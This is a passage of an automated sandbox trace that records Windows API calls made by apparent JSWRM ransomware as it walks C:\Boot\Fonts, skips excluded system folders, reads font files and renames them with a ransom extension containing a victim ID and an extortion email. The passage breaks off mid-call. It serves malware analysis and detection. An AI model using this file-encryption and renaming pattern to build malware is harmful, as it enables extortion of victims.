lstrcmpiW (lpString1="chs_boot.ttf", lpString2="system volume information") returned -1 [0063.821] lstrcmpiW (lpString1="chs_boot.ttf", lpString2="msocache") returned -1 [0063.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chs_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chs_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chs_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0063.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chs_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="chs_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="chs_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0063.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.821] CreateFileW (lpFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.823] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9257990987244136) returned 0 [0063.823] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.824] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.824] CloseHandle (hObject=0xffffffff) returned 1 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8670 [0063.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8670, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8670 | out: hHeap=0x1e0000) returned 1 [0063.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0063.824] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232e20 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0063.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.824] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0063.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.825] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a1dbea, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef81cc08, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x3b2e0a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2=".") returned 1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="..") returned 1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="...") returned 1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="windows") returned -1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="recovery") returned -1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="perflogs") returned -1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="documents and settings") returned -1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="system volume information") returned -1 [0063.825] lstrcmpiW (lpString1="cht_boot.ttf", lpString2="msocache") returned -1 [0063.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cht_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cht_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cht_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0063.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cht_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cht_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cht_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.825] CreateFileW (lpFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.828] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9251806234337896) returned 0 [0063.828] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.828] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.828] CloseHandle (hObject=0xffffffff) returned 1 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f87c0 [0063.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f87c0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f87c0 | out: hHeap=0x1e0000) returned 1 [0063.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0063.828] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232d50 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0063.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.829] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.829] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4a902c2, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef8771a7, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2488a26, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4d4b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2=".") returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="..") returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="...") returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="windows") returned -1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="recovery") returned -1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="perflogs") returned -1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="documents and settings") returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="$RECYCLE.BIN") returned 1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="system volume information") returned -1 [0063.829] lstrcmpiW (lpString1="jpn_boot.ttf", lpString2="msocache") returned -1 [0063.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0063.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpn_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpn_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f610, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jpn_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0063.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0063.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpn_boot.ttf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0063.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jpn_boot.ttf", cchWideChar=12, lpMultiByteStr=0x345f5e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jpn_boot.ttf", lpUsedDefaultChar=0x0) returned 12 [0063.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0063.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0063.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0063.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0063.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0063.830] CreateFileW (lpFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0063.834] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=9252115471983640) returned 0 [0063.834] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0063.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0063.834] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8, lpNumberOfBytesRead=0x345f2d4*=0x0, lpOverlapped=0x0) returned 0 [0063.834] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0063.834] CloseHandle (hObject=0xffffffff) returned 1 [0063.834] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0063.834] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0063.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0063.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0063.835] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x2330f8 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8c) returned 0x23b400 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0063.835] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.835] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\jpn_boot.ttf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0063.835] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0063.835] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb1deb7, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1cb1deb7, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1cb43e7c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0063.835] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0063.836] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0063.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0063.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0063.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0063.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0063.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0063.836] HeapFree (in: 